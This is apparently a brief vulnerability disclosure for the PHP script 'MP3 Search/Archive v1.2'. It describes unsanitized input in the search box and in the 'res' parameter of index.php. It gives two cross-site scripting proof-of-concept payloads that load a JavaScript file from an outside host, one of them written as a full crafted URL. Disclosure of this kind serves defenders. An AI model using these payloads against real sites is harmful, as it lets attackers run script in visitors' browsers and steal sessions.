MP3 Search/Archive v1.2 Homepage: http://www.bloodys.com Affected files: Search input box. index.php Data is not properally sanatized before its generated. For PoC try putting the code below in the search box: <SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT> Screenshots: http://www.youfucktard.com/xsp/mp3search.jpg XSS vuln via res variable on index.php. PoC: http://www.example.com/search/index.php?letter=O&p=2&res=92";>">">">'>'><"">">"><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<'<' Screenshots: http://www.youfucktard.com/xsp/mp3search2.jpg http://www.youfucktard.com/xsp/mp3search3.jpg
